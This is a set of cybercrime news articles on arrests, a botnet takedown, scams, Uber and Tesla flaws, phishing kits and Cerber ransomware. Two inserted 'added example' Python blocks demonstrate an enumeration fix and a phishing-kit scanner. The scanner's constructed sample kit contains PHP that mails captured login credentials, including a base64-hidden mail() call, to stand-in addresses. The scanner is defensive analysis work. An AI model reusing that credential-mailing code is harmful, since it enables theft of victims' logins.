London teenager arrested over huge cyberattack

Cyber crime police have arrested and bailed a 16-year-old from London in connection with a huge alleged cyberattack which is said to have affected the internet globally, it has been revealed.

According to the Evening Standard, police said they arrested the boy in April after “significant sums of money” were found to be “flowing through his bank account”.

The boy, who lives in south-west London, has not been identified, and was bailed until later this year. Detectives at the National Cyber Crime Unit were acting in concert with police from around the world in a swoop against a gang of suspected cybercriminals. A Dutch man, 35 years old and living in Spain, was also arrested at the time.

The attack in question was allegedly a distributed denial of service (DDoS) attack against the Dutch anti-spam group Spamhaus. In a DDoS attack, many computers are used to flood a website with requests at the same time, so that it becomes unavailable to its intended users.

The Standard cites a briefing document on the UK operation, describing the attack as the “largest DDoS attack ever seen,” which had a “worldwide impact” on internet exchanges.

It said the attack caused “worldwide disruption of the functionality” of the internet.

It continues: “The suspect was found with his computer systems open and logged on to various virtual systems and forums. The subject has a significant amount of money flowing through his bank account. Financial investigators are in the process of restraining monies.”

By James Legge


LulzSec leader named as Matthew Flannery faces 12 years in jail after arrest in Australia

The self-proclaimed leader of the “hacktivist” group LulzSec has been arrested and charged with hacking into government websites, Australian police have said.

The arrest comes as four LulzSec members in Britain face jail after admitting to a series of online attacks.

The identity of the 24-year-old has not yet been officially released, but reports in the Australian press named him as Matthew Flannery, who allegedly used the online name “Aush0k”. He was arrested in the coastal town of Point Clare, around 50 miles north of Sydney, and faces up to twelve years in prison after being charged with two counts of hacking into computers.

His arrest is another blow to the high-profile Anonymous splinter group, which was responsible for attacks on the CIA, the UK’s Serious Organised Crime Agency and News International.

LulzSec was compromised when its former de facto leader Hector Xavier Monsegur, who went by the moniker “Sabu” online, turned informant after his own arrest and spent around nine months working for the US authorities.

But other members of the hacktivist community mocked the description of the man as a “leader” of the group last night, with some claiming never to have encountered the username on the online chatrooms they use.

Australian Federal Police said they began their investigation into the man, who works in IT, earlier this month when their Cyber Crime Operations team found a “compromise to a government website”. Officers said he held a position of trust with the IT company he worked for and used it to access sensitive information from clients including government agencies.

In a statement, police said: “The AFP [Australian Federal Police] believes the man’s knowledge and skills presented a significant risk to the clients of the company for which he was employed had he continued his illegal online activities.”

Cyber Crime Operations Commander Glen McEwen said the impairment or disruption of communications to or from computer networks can have serious consequences. “Those thinking of engaging in such activities should be warned that hacking, creating or propagating malicious viruses or participating in Distributed Denial of Service attacks are not harmless fun,” Commander McEwen said.

“Criminal acts such as this can result in serious long-term consequences for individuals, such as criminal convictions or imprisonment.” Police said the man was bailed to reappear in court on May 15.

Just five days ago, another member of the hacking group was jailed by a Los Angeles court for hacking Sony Pictures Entertainment. Cody Kretsinger, 25, was known online as “Recursion”. He was given a one-year term after pleading guilty last April. He will also be required to carry out 1,000 hours of community service after his release for his part in the hack, which Sony said caused more than $600,000 (£392,000) in damage.

By Kevin Rawlinson


$500 million botnet Citadel attacked by Microsoft and the FBI

Joint operation identified more than 1,000 botnets, but operations continue.

A joint strike by Microsoft and the FBI, with aid from authorities in more than 80 countries, has begun breaking up the Citadel network – a cybercrime ring responsible for stealing more than $500 million (£323 million) from bank accounts.

The criminals in charge of the Citadel network installed key logging software on up to five million computers to steal data, recording logins and passwords before emptying individuals’ online accounts.

Banks affected by the group’s activities included American Express, Bank of America, HSBC, Wells Fargo, PayPal, and Royal Bank of Canada.

Microsoft describes the internationally-organised assault as “our most aggressive botnet operation to date”, marking the first time that “law enforcement and the private sector have worked together […] to execute a civil seizure warrant as part of a botnet disruption operation.”

During the attack, codenamed Operation b54, more than 1,000 botnets were shut down on Wednesday, with Microsoft stating that 455 of those were hosted in 40 data centres in the US.

Richard Boscovich of the Digital Crimes Unit has said that those who run the data centres are usually unaware of the botnets: “There is no responsibility on their part to see what is in the pipes,” he said.

Reuters’ reports on the operation warn that it will not extinguish the Citadel group, but that it will “significantly disrupt” the group’s operations.

Citadel’s operations were started after the source code for an infamous cybercrime toolkit named Zeus was released in 2011. The code available from Zeus offered tools for many forms of cybercrime, from keystroke logging to phishing schemes.

The code was then augmented by enthusiasts and opportunists on cybercrime forums, with Citadel’s tweaks to the toolkit hiding it from the programs originally designed to detect Zeus. Citadel even blocked victims’ access to legitimate anti-virus and anti-malware sites, making it more difficult to remove the malicious software even if victims were alerted to its presence.

Microsoft is also hunting a hacker known by the alias Aquabox, who was named as the ringleader of the operation in a civil lawsuit filed by the company in North Carolina.

Richard Boscovich of the Digital Crimes Unit suspects Aquabox lives in eastern Europe, as the programs operated by the botnet are programmed not to attack institutions in Ukraine or Russia, likely to avoid attracting local attention to the criminals.

Boscovich describes Aquabox’s operation as international in its scope, working with at least 81 “herders” who help to run the botnet from anywhere in the world. He also operated a forum for his subordinates where they could suggest new tweaks to the software, and exchange tips on managing the computers in their charge.

“Like many of our past operations, this investigation once again revealed how criminals are adapting and evolving,” said Boscovich. “Cooperation is the key to winning the fight against cybercrime, and I’m excited about the opportunity we had to work with law enforcement and the other partners involved.”

By James Vincent


Clicking WhatsApp links making users vulnerable to cybercrime

Clicking on links circulated on the instant messaging app may expose users to cyberattacks

In a warning to WhatsApp users across the globe, a report said that clicking on links circulated on the instant messaging app may expose them to cyberattacks. According to a report in The Sun newspaper, hackers are using simple tricks to fool people into visiting booby-trapped websites and then fleecing them.

Recently, WhatsApp rolled out video calling, and scammers are using this new feature as bait to tempt people into their trap. Video calling download links shared in WhatsApp messages take users to malicious websites.

“If you receive an email asking you to “activate” the function by visiting a website, make sure you don’t click it. Anyone who is tricked into visiting the danger pages could end up being targeted by digital criminals,” the report pointed out.

Earlier this month, announcing that India now has nearly 160 million monthly active users, WhatsApp launched its video calling feature here as part of a global rollout. The feature is available on all platforms — Android, iOS and Windows. A user does not need to visit any link to download the feature: it arrives as a regular WhatsApp update through the app store.

WhatsApp is available in more than 50 different languages around the world and in 10 Indian languages. Nearly 100 million calls are being made on the platform daily worldwide. With the video calling feature, WhatsApp will now compete with Microsoft-owned Skype and Google’s Duo.

Another hoax, ‘WhatsApp Gold’, which has also been doing the rounds on the popular messaging app, gives users a link to open, claiming that it offers access to an exclusive version of the app.



Google Warns Users of Recent State-sponsored Attacks

Over the last few days, Google has delivered a batch of warnings about potential government-backed attacks against numerous journalists, academics and activists. Many of the recipients have announced their personal warnings on Twitter. There are some differences in the wording of some of the warnings, but Google has confirmed that the Twitter postings appear to be authentic.

Google has been issuing such warnings since 2012. At first they were simple text alerts across the top of the recipients’ Gmail page. In March of this year it started to use the larger, more noticeable banners that are now appearing. The warnings do not indicate that an account has actually been compromised; only that Google researchers have seen indications of an attempt against the account.

The warnings are also not timely. The attack indicators were likely noticed up to a month earlier. Google does not issue immediate warnings for fear that this will allow attackers to determine the method of discovery. This time lapse has led to certain assumptions that the attackers are likely to be the Russian actors, possibly APT28 or APT29, that were linked to attacks against the Democrats, supposedly to influence the election. (Last month, Russian hackers were also linked with targeting journalists investigating the MH17 crash.)

[Image: Google state-sponsored attack warning banner]

This, however, has to be conjecture. Google does not publicly provide any evidence on the identity of the attackers — and at least one target is a Hong Kong-based Chinese activist (Joshua Wong Chi-fung).

“Google has been secretive about the algorithms and criteria it uses to determine that a potential attack is state-sponsored,” explains ESET senior research fellow David Harley; adding that such secrecy about proprietary algorithms is not unusual in the security industry. “The relationship with the APT29 targeted malware is speculative, but I can’t say there isn’t a connection. If an attack is based on code that is associated with known state-sponsored attacks, that could be another indicator, if you have that sort of information. Google isn’t exactly known for a spirit of friendly cooperation with the security industry at large, but it certainly has security resources.”

There is, however, an element of hysteria about this current batch of warnings; as if users need to take different precautions against nation-state attacks than they do against everyday criminal attacks. Activists are more likely to be attacked for political reasons, and in some cases the consequences could be more dire — but the defenses remain the same as those everybody should be using as a matter of course.

“Journalists and professors already know what they should do – and if they don’t, they can easily look it up. If they don’t already follow best practices it’s because they suffer from the fallacy that they aren’t important enough to target,” comments F-Secure’s Sean Sullivan. It is certainly true that users receiving Google warnings should take immediate steps to confirm the integrity of their account: Google doesn’t say the attack was successful, but nor does it say it failed.

Caleb Chen, who works with Private Internet Access, points out that state-sponsored attacks may be more prevalent than is commonly thought. Google says only that it is likely to happen to less than 0.1% of its users. If there are a billion Gmail users, he suggests, those figures mean that up to a million may have seen state-sponsored probing. “As cyber-attacks continue to proliferate, often times across borders, expect reports of this type of probing to rise in the future.”

There is also an irony about warnings being attributed to foreign governments coming at the same time as the US and particularly the UK governments are increasing their own surveillance capabilities. Luis Corrons, technical director at PandaLabs, insists there is a difference. “One thing is knowing that governments are harvesting loads of information from everyone, and another thing is an attack targeted at you, so they can compromise your computer and access (steal) all your information, sources, etc.”

Nevertheless, Chen reports a 30% spike in VPN sales from the UK in the week in which the IP Bill completed its course through parliament. While standard computer defenses are required to protect accounts, VPNs are now also required to protect communications — especially those of activists of any persuasion.

Account defenses obviously include strong passwords, 2FA where possible, reputable anti-virus, and an awareness of spear-phishing techniques; but Corrons offers one other piece of advice for journalists and activists: “Ideally have all your sensitive information in a different computer to the one you use for your emails, Internet, etc. Even better if this one is not connected to the Internet.”

By Kevin Townsend


Flaws in Uber’s UberCENTRAL Tool Exposed User Data

Several vulnerabilities have been identified in Uber’s recently launched UberCENTRAL service. The ride-sharing company patched the flaws and rewarded the expert who found them.

Announced in late July, UberCENTRAL provides a dashboard that companies can use to pay for Uber rides on behalf of their customers. UberCENTRAL administrators can add operators (i.e. employees who request rides for customers) based on their email address.

Since the rules of Uber’s bug bounty program specifically mention enumeration issues, bounty hunter Kevin Roh decided to see if such flaws are present in UberCENTRAL. Uber is particularly interested in vulnerabilities that can be used to enumerate users’ universally unique identifiers (UUIDs) via phone numbers or email addresses as these can allow insecure direct object reference (IDOR) attacks.

One of the flaws discovered by Roh allowed attackers to enumerate user UUIDs by sending requests with possible email addresses. If the email address is associated with an account, the response from the server will include the user’s UUID. If the email address is not valid, the response will contain an error.

While the second issue identified by the expert is similar, the third security hole he found could have been exploited to obtain not only UUIDs, but also full names, phone numbers and email addresses.
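The first flaw above is a classic account enumeration oracle: the server's answer differs depending on whether an email address exists. The added example below (not Uber's code; users, emails and UUIDs are constructed) contrasts such a leaky lookup with a hardened invite endpoint that answers identically for known and unknown addresses, never returns the UUID, and rate limits callers, plus a check a defender can run against any handler to see whether its responses are distinguishable.

```python
"""Added example: user enumeration via an email lookup, and a response-shape fix.

Constructed in-memory stand-in for an 'add operator by email' endpoint; it is
not Uber's code. User records, emails and UUIDs are made up for the demo.
"""
from collections import defaultdict

# Constructed user directory: email -> UUID (sample values, not real accounts).
USERS = {
    "alice@example.com": "3d0ef9b2-7f4a-4c1e-9d2b-5b1e2e7a0c11",
    "bob@example.com": "9a7c1f44-2b6d-4e0a-8f3c-1c9d4b2e6a77",
}


def lookup_vulnerable(email: str) -> dict:
    """Leaks existence: a known email returns its UUID, an unknown one an error."""
    if email in USERS:
        return {"status": 200, "uuid": USERS[email]}
    return {"status": 404, "error": "no account for that email"}


class InviteService:
    """Hardened variant: the same response for any syntactically valid email,
    the UUID stays server-side, and each caller is rate limited per window."""

    def __init__(self, max_per_hour: int = 20):
        self.max_per_hour = max_per_hour
        self.calls = defaultdict(int)   # caller id -> calls in this window
        self.outbox = []                # (email, uuid-or-None) invites to deliver

    def invite_operator(self, caller: str, email: str) -> dict:
        self.calls[caller] += 1
        if self.calls[caller] > self.max_per_hour:
            return {"status": 429, "error": "too many requests"}
        if "@" not in email:
            return {"status": 400, "error": "invalid email"}
        # Known or not, queue the same action and answer identically; the UUID
        # is resolved out of band by the delivery job and is never returned.
        user_id = USERS.get(email)
        self.outbox.append((email, user_id))
        return {"status": 202,
                "message": "If that address has an account, an invite was sent."}


def responses_distinguishable(handler, known: str, unknown: str) -> bool:
    """Defender's check: can a caller tell a known email from an unknown one?
    Compares the whole response, since status code and body shape both leak."""
    return handler(known) != handler(unknown)
```
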

These issues were reported to Uber in September and October, and they were patched in October. The company awarded Roh hundreds of dollars for each of the vulnerabilities, but the exact amounts have not been disclosed. Roh is one of the top hackers in Uber’s bug bounty program.

The company says it has paid out more than $700,000 so far, with the average bounty ranging between $750 and $1,000. A researcher earned $10,000 this summer after informing Uber of a critical flaw in a third-party WordPress plugin used on the company’s websites.

Researchers from security consulting and audit firm Integrity informed Uber of 14 flaws, including ones that could have allowed attackers to access the details of Uber drivers and passengers.

By Eduard Kovacs


Backdoored Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.
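The two tricks described above (a hardcoded recipient next to the PHP `mail` call, and a PHP payload hidden behind a base64 blob in a file named as if it were JavaScript) are exactly what an analyst triaging a seized kit looks for. The added example below is not Proofpoint's code or any real kit: it builds a constructed two-file sample with made-up addresses and scans it for recipient addresses, includes of non-PHP files that actually contain PHP, and base64-encoded payloads, decoding them recursively so a recipient hidden inside `eval(base64_decode(...))` is still reported.

```python
"""Added example: triage a downloaded phishing kit for hidden exfiltration.

Constructed sample kit (two files, made-up addresses) modelled on the page's
description; it is not code from Proofpoint or from any real kit.
"""
import base64
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
INCLUDE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")
B64_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
NON_PHP_EXT = (".js", ".css", ".jpg", ".png", ".txt")

# Constructed kit: a visible mail() call plus a 'style.js' that is really PHP.
_HIDDEN_PHP = 'mail("hidden-author@example.org", "creds", $msg);'
_B64 = base64.b64encode(_HIDDEN_PHP.encode()).decode()
SAMPLE_KIT = {
    "login.php": (
        '<?php\n'
        '$msg = "user=" . $_POST["email"] . "&pass=" . $_POST["password"];\n'
        'include("style.js");\n'
        '$to = "kit-buyer@example.net";\n'
        'mail($to, "Result", $msg);\n'
    ),
    "style.js": '<?php eval(base64_decode("' + _B64 + '")); ?>',
}


def _decoded_layers(text: str, depth: int = 3) -> list:
    """Return the text plus every base64_decode() payload found, recursively."""
    layers = [text]
    if depth == 0:
        return layers
    for blob in B64_RE.findall(text):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue
        layers.extend(_decoded_layers(inner, depth - 1))
    return layers


def scan_kit(files: dict) -> dict:
    """Report recipient addresses, disguised PHP includes and encoded payloads.

    files maps a path inside the kit to its contents (already read from disk).
    """
    report = {"recipients": {}, "disguised_includes": [], "encoded_payloads": []}
    for name, content in files.items():
        # An include of a .js/.css/image file that contains a PHP open tag is
        # the "style.js" trick: PHP is executed regardless of the extension.
        for target in INCLUDE_RE.findall(content):
            if target.lower().endswith(NON_PHP_EXT) and "<?php" in files.get(target, ""):
                report["disguised_includes"].append((name, target))
        layers = _decoded_layers(content)
        if len(layers) > 1:
            report["encoded_payloads"].append(name)
        # Collect addresses only from layers that actually send mail, so the
        # hidden recipient is attributed to the file whose decoded code sends it.
        found = set()
        for layer in layers:
            if re.search(r"\bmail\s*\(", layer):
                found.update(EMAIL_RE.findall(layer))
        if found:
            report["recipients"][name] = sorted(found)
    return report
```

Run on a real kit, the same report would show every address the phished credentials are sent to, which is the list that matters for takedown requests and for knowing how many actors received the victims' data.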

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.

By Ionut Arghire


Researchers Hijack Tesla Car by Hacking Mobile App

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

UPDATE. Tesla told SecurityWeek that none of the vulnerabilities used in this attack are specific to the company’s products.

“The report and video do not demonstrate any Tesla-specific vulnerabilities,” said a Tesla spokesperson. “This demonstration shows what most people intuitively know – if a phone is hacked, the applications on that phone may no longer be secure. The researchers showed that known social engineering techniques could be employed to trick people into installing malware on their Android devices, compromising their entire phone and all apps, which also includes their Tesla app. Tesla recommends users run the latest version of their mobile operating system.”

By Ionut Arghire


Cerber 5.0 Ransomware Uses New IP Ranges

The cyber criminals behind the notorious Cerber ransomware family have released three new versions of the malware this week, with the most notable change being the addition of new IP ranges in Cerber 5.0.

Initially spotted in early March, Cerber took a different approach to informing users that they have been infected: it included a .vbs file with a VBScript that caused the compromised machine to speak to the victim. Adding the .CERBER extension to encrypted files, the threat was also observed scanning all accessible network shares for files to encrypt.

Used in massive campaigns worldwide, including one targeting Office 365 users, Cerber has seen numerous upgrades since March, with the second major release observed in early August. Available to other cybercriminals via the ransomware-as-a-service model, Cerber was estimated in August to generate $2.3 million in annual revenue.

Cerber 4.0, the latest major variant of the malware, was released about a month and a half ago, roughly one week after the threat was observed killing database processes on the infected machines and just over a month after Cerber 3.0 emerged.

On Thursday, security researchers observed version 5.0 of the ransomware being distributed, less than 24 hours after version 4.1.6 had been released. Several hours later, version 5.0.1 also emerged, showing that the malware’s developers are aggressively updating their software.

While analyzing Cerber 5.0, Check Point security researchers noticed that it uses new IP ranges for its command and control (C&C) communication. One of the IP ranges had already been observed in version 4.1.6, but the rest of them appear to be brand new. Just as before, the security researchers explain, the malware broadcasts messages to all IP addresses via UDP.

Other changes in the new variant include the fact that it skips 640 bytes when encrypting a file (compared to 512 bytes before), and that it doesn’t encrypt files smaller than 2,560 bytes (compared to 1,024 bytes before). Moreover, the ransomware now also targets files that feature the .secret extension.

At the moment, the ransomware is being distributed via spam emails and exploit kits, specifically the Rig-V exploit kit. As with the previous variants, the malware generates the extension of each encrypted file from four random alphabetic letters.

The malware continues to search for databases and their related files, and can encrypt various database file types, Check Point says. It drops a ransom note on the desktop to inform users of the infection, and also drops an interactive .hta file with information in different languages. The rest of the features are unchanged from the previous releases.

By Ionut Arghire